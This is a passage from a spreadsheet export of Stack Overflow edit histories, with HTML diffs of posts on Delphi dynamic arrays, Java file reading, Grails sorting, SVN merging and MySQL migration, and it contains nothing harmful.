&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Im&lt;/span&gt; developing class to represent special kind of matrix:&lt;br&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; type DifRecord = record&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Field: String; &lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Number: Byte; &lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Value: smallint; &lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; end; &lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; type&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; TData = array of array of MainModule.DataRecord;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; type&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; TDifference = array of DifRecord;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; type&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; TFogelMatrix = class&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; private&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; M: Byte;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; N: Byte;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Data: ^TData;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; DifVector: ^TDifference;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; procedure init(); &lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; public&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; constructor Create(Rows, Cols: Byte);&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; destructor Destroy;&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; end; &lt;/span&gt;&lt;/code&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Now&lt;/span&gt; in constructor I need to reserve memory for Data and DifVector class members. I use pointers to array of records, as you see. So, the main question is, how can I correctly reserve memory? I suppose I can not use something like that:&lt;br&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;new(Data);&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; new(DifVector);&lt;/span&gt;&lt;br&gt;&lt;/code&gt; cause I`m loosing the main idea - to reserve memory space, as much as I want to, at run-time. Thanks for comments.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I'm&lt;/span&gt; developing class to represent special kind of matrix:&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;type_x000D_
  DifRecord = record_x000D_
    Field: String;_x000D_
    Number: Byte;_x000D_
    Value: smallint;_x000D_
  end;_x000D_
_x000D_
type_x000D_
  TData = array of array of MainModule.DataRecord;_x000D_
_x000D_
type_x000D_
  TDifference = array of DifRecord;_x000D_
_x000D_
type_x000D_
  TFogelMatrix = class_x000D_
  private_x000D_
    M: Byte;_x000D_
    N: Byte;_x000D_
    Data: ^TData;_x000D_
    DifVector: ^TDifference;_x000D_
    procedure init(); _x000D_
  public_x000D_
    constructor Create(Rows, Cols: Byte);_x000D_
    destructor Destroy;_x000D_
  end;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Now&lt;/span&gt; in constructor I need to reserve memory for Data and DifVector class members. I use pointers to array of records, as you see. So, the main question is, how can I correctly reserve memory? I suppose I can not use something like that: &lt;span class="diff-add"&gt;new(Data); new(DifVector);&lt;/span&gt; cause I`m loosing the main idea - to reserve memory space, as much as I want to, at run-time. Thanks for comments.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lasse V. Karlsen</t>
  </si>
  <si>
    <t>chester89</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Quick &amp;amp; Dirty Answer&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for (int i=0; i&amp;lt;array.length; i++) {_x000D_
    this.myJTextField.setText(this.myJTextField.getText() + ", " + array[i]);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-delete"&gt;Correct Way&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h3&gt;&lt;span class="diff-delete"&gt;User defined format&lt;/span&gt;&lt;/h3&gt; _x000D_
 &lt;span class="diff-delete"&gt;Note you can convert any number to a string by simply doing `"" + number` too. If you have many strings, consider using a string builder, as that's faster and won't update the GUI element multiple times: (also fixes the initial `", "` before the first item, which happens above)&lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StringBuilder builder = new StringBuilder();_x000D_
for (int i=0; i&amp;lt;array.length; i++) {_x000D_
    builder.append(array[i]));_x000D_
    if(i + 1 != array.length) _x000D_
        builder.append(", ");_x000D_
}_x000D_
this.myJTextField.setText(builder.toString());_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;h3&gt;&lt;span class="diff-delete"&gt;Canonical array representation&lt;/span&gt;&lt;/h3&gt; _x000D_
 &lt;span class="diff-delete"&gt; Alternatively, you can use this: &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;this.myJTextField.setText(Arrays.toString(array));_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; It will look like &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;[1, 4, 5, 6]&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for (int i=0; i&amp;lt;array.length; i++) {_x000D_
    this.myJTextField.setText(this.myJTextField.getText() + ", " + array[i]);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Note you can convert any number to a string by simply doing &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;"" + number&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; too. If you have many strings, consider using a string builder, as that's faster and won't update the GUI element multiple times: (also fixes the initial &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;", "&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; before the first item, which happens above)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;StringBuilder builder = new StringBuilder();_x000D_
for (int i=0; i&amp;lt;array.length; i++) {_x000D_
    builder.append(array[i]));_x000D_
    if(i + 1 != array.length) _x000D_
        builder.append(", ");_x000D_
}_x000D_
this.myJTextField.setText(builder.toString());_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Johannes Schaub - litb</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You may have to write a custom finder in HQL&lt;span class="diff-delete"&gt;,&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MyDomain.find("from Domain as d order by last&lt;span class="diff-delete"&gt; desc&lt;/span&gt;,first desc")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; or use the Criteria Builder,&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[Edited]&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;[Note: Please see &lt;/span&gt;&lt;a href="https://stackoverflow.com/a/1633716/42769"&gt;&lt;span class="diff-delete"&gt;mattlary's answer&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; below]&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def c = MyDomain.createCriteria()_x000D_
def results = c.list {_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;     &lt;span class="diff-delete"&gt;// Old solution;&lt;/span&gt; &lt;span class="diff-delete"&gt;namely,&lt;/span&gt; order("last,&lt;span class="diff-delete"&gt; &lt;/span&gt;first"&lt;span class="diff-delete"&gt;, "desc"),_x000D_
       // doesn't seem to work anymore. Updated accordingly._x000D_
       order("last"&lt;/span&gt;, "desc")&lt;span class="diff-delete"&gt; _x000D_
       order("first", "desc") &lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;This old solution no longer works. Please see mattlary's answer below&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; You may have to write a custom finder in HQL&lt;span class="diff-add"&gt; or use the Criteria Builder.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;MyDomain.find("from Domain as d order by last,first desc")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Or&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def c = MyDomain.createCriteria()_x000D_
def results = c.list {_x000D_
       order("last,first", "desc")_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>doelleri</t>
  </si>
  <si>
    <t>Adeel Ansari</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Read all text from a file&lt;/h2&gt; _x000D_
 &lt;p&gt; Here's a compact, robust idiom for Java 7, wrapped up in a utility method:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; java.nio.file.Files;_x000D_
_x000D_
&lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; String &lt;span class="hljs-title"&gt;readFile&lt;/span&gt;&lt;span class="hljs-params"&gt;(String path, Charset encoding)&lt;/span&gt; &lt;span class="hljs-keyword"&gt;throws&lt;/span&gt; IOException _x000D_
&lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;byte&lt;/span&gt;[] encoded = Files.readAllBytes(Paths.get(path));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; String(encoded, encoding);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Read lines of text from a file&lt;/h2&gt; _x000D_
 &lt;p&gt; Java 7 added a &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/file/Files.html#readAllLines%28java.nio.file.Path,%20java.nio.charset.Charset%29" rel="nofollow noreferrer"&gt;convenience method to read a file as lines of text,&lt;/a&gt; represented as a &lt;code&gt;List&amp;lt;String&amp;gt;&lt;/code&gt;. This approach is "lossy" because the line separators are stripped from the end of each line.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;List&amp;lt;String&amp;gt; lines = Files.readAllLines(Paths.get(path), encoding);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Memory utilization&lt;/h2&gt; _x000D_
 &lt;p&gt; The first method, that preserves line breaks, can temporarily require memory several times the size of the file, because for a short time the raw file contents (a byte array), and the decoded characters (each of which is 16 bits even if encoded as 8 bits in the file) reside in memory at once. It is safest to apply to files that you know to be small relative to the available memory.&lt;/p&gt; _x000D_
 &lt;p&gt; The second method, reading lines, is usually more memory efficient, because the input byte buffer for decoding doesn't need to contain the entire file. However, it's still not suitable for files that are very large relative to available memory.&lt;/p&gt; _x000D_
 &lt;p&gt; For reading large files, you need a different design for your program, one that reads a chunk of text from a stream, processes it, and then moves on to the next, reusing the same fixed-sized memory block. Here, "large" depends on the computer specs. Nowadays, this threshold might be many gigabytes of RAM.&lt;/p&gt; _x000D_
 &lt;h2&gt;Character encoding&lt;/h2&gt; _x000D_
 &lt;p&gt; One thing that is missing from the sample in the original post is the character encoding. There are some special cases where the platform default is what you want, but they are rare, and you should be able justify your choice.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/charset/StandardCharsets.html" rel="nofollow noreferrer"&gt;&lt;code&gt;StandardCharsets&lt;/code&gt;&lt;/a&gt; class define some constants for the encodings required of all Java runtimes:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;String content = readFile(&lt;span class="hljs-string"&gt;"test.txt"&lt;/span&gt;, StandardCharsets.UTF_8);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The platform default is available from &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/charset/Charset.html#defaultCharset%28%29" rel="nofollow noreferrer"&gt;the &lt;code&gt;Charset&lt;/code&gt; class&lt;/a&gt; itself:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;String content = readFile(&lt;span class="hljs-string"&gt;"test.txt"&lt;/span&gt;, Charset.defaultCharset());_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Note: This answer largely replaces my Java 6 version. The utility of Java 7 safely simplifies the code, and the old answer, which used a mapped byte buffer, prevented the file that was read from being deleted until the mapped buffer was garbage collected. You can view the old version via the "edited" link on this answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Read all text from a file&lt;/h2&gt; _x000D_
 &lt;p&gt; Here's a compact, robust idiom for Java 7, wrapped up in a utility method:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; String &lt;span class="hljs-title"&gt;readFile&lt;/span&gt;&lt;span class="hljs-params"&gt;(String path, Charset encoding)&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-function"&gt; _x000D_
 &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-function"&gt; &lt;span class="hljs-keyword"&gt;throws&lt;/span&gt; IOException _x000D_
&lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;byte&lt;/span&gt;[] encoded = Files.readAllBytes(Paths.get(path));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; String(encoded, encoding);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Read lines of text from a file&lt;/h2&gt; _x000D_
 &lt;p&gt; Java 7 added a &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/file/Files.html#readAllLines%28java.nio.file.Path,%20java.nio.charset.Charset%29" rel="nofollow noreferrer"&gt;convenience method to read a file as lines of text,&lt;/a&gt; represented as a &lt;code&gt;List&amp;lt;String&amp;gt;&lt;/code&gt;. This approach is "lossy" because the line separators are stripped from the end of each line.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;List&amp;lt;String&amp;gt; lines = Files.readAllLines(Paths.get(path), encoding);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Memory utilization&lt;/h2&gt; _x000D_
 &lt;p&gt; The first method, that preserves line breaks, can temporarily require memory several times the size of the file, because for a short time the raw file contents (a byte array), and the decoded characters (each of which is 16 bits even if encoded as 8 bits in the file) reside in memory at once. It is safest to apply to files that you know to be small relative to the available memory.&lt;/p&gt; _x000D_
 &lt;p&gt; The second method, reading lines, is usually more memory efficient, because the input byte buffer for decoding doesn't need to contain the entire file. However, it's still not suitable for files that are very large relative to available memory.&lt;/p&gt; _x000D_
 &lt;p&gt; For reading large files, you need a different design for your program, one that reads a chunk of text from a stream, processes it, and then moves on to the next, reusing the same fixed-sized memory block. Here, "large" depends on the computer specs. Nowadays, this threshold might be many gigabytes of RAM.&lt;/p&gt; _x000D_
 &lt;h2&gt;Character encoding&lt;/h2&gt; _x000D_
 &lt;p&gt; One thing that is missing from the sample in the original post is the character encoding. There are some special cases where the platform default is what you want, but they are rare, and you should be able justify your choice.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/charset/StandardCharsets.html" rel="nofollow noreferrer"&gt;&lt;code&gt;StandardCharsets&lt;/code&gt;&lt;/a&gt; class define some constants for the encodings required of all Java runtimes:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;String content = readFile(&lt;span class="hljs-string"&gt;"test.txt"&lt;/span&gt;, StandardCharsets.UTF_8);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The platform default is available from &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/nio/charset/Charset.html#defaultCharset%28%29" rel="nofollow noreferrer"&gt;the &lt;code&gt;Charset&lt;/code&gt; class&lt;/a&gt; itself:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;String content = readFile(&lt;span class="hljs-string"&gt;"test.txt"&lt;/span&gt;, Charset.defaultCharset());_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Note: This answer largely replaces my Java 6 version. The utility of Java 7 safely simplifies the code, and the old answer, which used a mapped byte buffer, prevented the file that was read from being deleted until the mapped buffer was garbage collected. You can view the old version via the "edited" link on this answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is a variation on the same theme that uses a for loop, instead of a while loop, to limit the scope of the line variable. Whether it's "better" is a matter of personal taste.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;BufferedReader reader = new BufferedReader( new FileReader (file));_x000D_
String         line = null;_x000D_
StringBuilder  stringBuilder = new StringBuilder();_x000D_
String         ls = System.getProperty("line.separator");_x000D_
_x000D_
&lt;/span&gt;for(String line = reader.readLine(); line != null; line = reader.readLine()) {_x000D_
    stringBuilder.append(line);_x000D_
    stringBuilder.append(ls);_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
_x000D_
return stringBuilder.toString();&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is a variation on the same theme that uses a for loop, instead of a while loop, to limit the scope of the line variable. Whether it's "better" is a matter of personal taste.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for(String line = reader.readLine(); line != null; line = reader.readLine()) {_x000D_
    stringBuilder.append(line);_x000D_
    stringBuilder.append(ls);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dan Dyer</t>
  </si>
  <si>
    <t>Eric Leschinski</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have been using TortoiseSVN, svn, and subclipse and I think I understand the basics, but there's one thing that's been bugging me for a while: Merging introduces unwanted code. Here's the steps.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;trunk/test.txt@r2&lt;/code&gt;. A test file was created with 'A' and a return:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r3&lt;/code&gt;. Branched out the &lt;code&gt;trunk&lt;/code&gt; to &lt;code&gt;TRY-XX-Foo&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r4&lt;/code&gt;. Made an unwanted change in &lt;code&gt;TRY-XX-Foo&lt;/code&gt; and committed it:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
B (unwanted change)_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r5&lt;/code&gt;. Made an important bug fix in &lt;code&gt;TRY-XX-Foo&lt;/code&gt; and committed it:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
B (unwanted change)_x000D_
C (important bug fix)_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now, I would like to merge only the important bug fix back to trunk. So, I run merge for revision &lt;code&gt;4:5&lt;/code&gt;. What I end up in my working directory is a conflict.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;trunk/test.txt&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt; .working_x000D_
=======_x000D_
B (unwanted change)_x000D_
C (important bug fix)_x000D_
&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt; .merge-right.r5_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Against my will, Subversion has now included "unwanted change" into the trunk code, and I need to weed them out manually. Is there a way to merge only specified revisions when multiple consecutive changes are made in the branch?&lt;/p&gt; _x000D_
 &lt;p&gt; The part of the problem is that B (unwated change) is included in .merge-right and I can't tell the difference between which revision it came from.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have been using TortoiseSVN, svn, and subclipse and I think I understand the basics, but there's one thing that's been bugging me for a while: Merging introduces unwanted code. Here's the steps.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;trunk/test.txt@r2&lt;/code&gt;. A test file was created with 'A' and a return:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r3&lt;/code&gt;. Branched out the &lt;code&gt;trunk&lt;/code&gt; to &lt;code&gt;TRY-XX-Foo&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r4&lt;/code&gt;. Made an unwanted change in &lt;code&gt;TRY-XX-Foo&lt;/code&gt; and committed it:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
B (unwanted change)_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;branches/TRY-XX-Foo/test.txt@r5&lt;/code&gt;. Made an important bug fix in &lt;code&gt;TRY-XX-Foo&lt;/code&gt; and committed it:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
B (unwanted change)_x000D_
C (important bug fix)_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now, I would like to merge only the important bug fix back to trunk. So, I run merge for revision &lt;code&gt;4:5&lt;/code&gt;. What I end up in my working directory is a conflict.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;trunk/test.txt&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;A_x000D_
&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt; .working_x000D_
=======_x000D_
B (unwanted change)_x000D_
C (important bug fix)_x000D_
&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt; .merge-right.r5_x000D_
[EOF]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Against my will, Subversion has now included "unwanted change" into the trunk code, and I need to weed them out manually. Is there a way to merge only specified revisions when multiple consecutive changes are made in the branch?&lt;/p&gt; _x000D_
 &lt;p&gt; The part of the problem is that B (unwated change) is included in .merge-right and I can't tell the difference between which revision it came from.&lt;span class="diff-add"&gt; I usually use TortoiseMerge and here's how it looks.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img132.imageshack.us/img132/4125/testtxtworking2va9.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;text.txt.working http://img132.imageshack.us/img132/4125/testtxtworking2va9.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jonathan Drapeau</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm told by a reliable (but currently inebriated, so take it with a grain of salt) source that it's a zero instruction which is illegal and causes some sort of system trap.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm told by a reliable (but currently inebriated, so take it with a grain of salt) source that it's a zero instruction which is illegal and causes some sort of system trap.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: Made into community wiki in case my friend is so drunk that he's talking absolute rubbish :-)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You need to either use this one:&lt;/p&gt; _x000D_
 &lt;p&gt;.Where(string.Format("it.ID in {0}", string.Join(",", valueIds.ToArray())));&lt;/p&gt; _x000D_
 &lt;p&gt; or construct the WHERE part dynamically, as in &lt;a href="https://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3917617&amp;amp;SiteID=1" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;this&lt;/span&gt;&lt;/a&gt; post.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You need to either use this one:&lt;/p&gt; _x000D_
 &lt;p&gt;.Where(string.Format("it.ID in {0}", string.Join(",", valueIds.ToArray())));&lt;/p&gt; _x000D_
 &lt;p&gt; or construct the WHERE part dynamically, as in &lt;a href="http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3917617&amp;amp;SiteID=1" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;this&lt;/span&gt;&lt;/a&gt; post.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>liggett78</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a mysql database filled up and running on a windows computer, is there any tool to transfer the database to another computer (running ubuntu)?&lt;/p&gt; _x000D_
 &lt;p&gt; Else I'll just write a script to take all the data base into SQL and insert it on the other computer. Just trying to save some time&lt;span class="diff-delete"&gt; :)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Thank you all&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
